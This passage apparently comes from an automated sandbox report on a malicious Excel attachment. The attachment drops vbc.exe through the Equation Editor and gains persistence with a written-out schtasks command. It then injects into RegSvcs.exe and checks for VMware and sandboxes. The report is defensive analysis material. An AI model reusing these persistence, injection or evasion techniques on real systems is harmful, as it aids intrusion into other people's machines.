      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: PR0078966.xlsxStatic file information: File size 2592768 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\System.pdbX source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: indows\System.pdbpdbtem.pdblog source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: T3UpC:\Windows\System.pdb source: RegSvcs.exe, 00000007.00000002.2371635482.0000000004D2C000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: 72s.pdb source: RegSvcs.exe, 00000007.00000002.2371200857.00000000046AD000.00000004.00000001.sdmp
      Source: Binary string: indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb:\B source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2369796827.00000000002B8000.00000004.00000020.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2180059913.0000000001090000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2371068879.0000000004580000.00000002.00000001.sdmp
      Source: PR0078966.xlsxInitial sample: OLE indicators vbamacros = False
      Source: PR0078966.xlsxInitial sample: OLE indicators encrypted = True

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0024745C pushad ; retn 0024h
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00247D9E push ecx; ret
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0045A50D push eax; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0045A91F push ecx; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0045A838 push eax; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004583C8 push esp; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00458494 push esp; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0045A498 push eax; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0045989B push ecx; retf 0045h
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0045A8AB push eax; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0054801A push ds; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005480B0 push ds; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0054A950 pushad ; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0054A978 pushad ; iretd
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00751590 push edx; iretd
      Source: initial sampleStatic PE information: section name: .text entropy: 7.83272627596
      Source: initial sampleStatic PE information: section name: .text entropy: 7.83272627596
      Source: initial sampleStatic PE information: section name: .text entropy: 7.83272627596
      Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\blFUun.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp'

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: PR0078966.xlsxStream path 'EncryptedPackage' entropy: 7.99986998424 (max. 8.0)

      Malware Analysis System Evasion:

      barindex
      Yara detected AntiVM3Show sources
      Source: Yara matchFile source: 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2344, type: MEMORY
      Source: Yara matchFile source: 4.2.vbc.exe.27a7390.3.raw.unpack, type: UNPACKEDPE
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2480Thread sleep time: -300000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 2304Thread sleep time: -104954s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 2812Thread sleep time: -60000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 2728Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 312Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00750D66 GetSystemInfo,
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 104954
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
      Source: vbc.exe, 00000004.00000002.2174881233.00000000003C8000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: VMWARE
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Allocates memory in foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
      Writes to foreign memory regionsShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
      Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
      Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
      Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
      Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
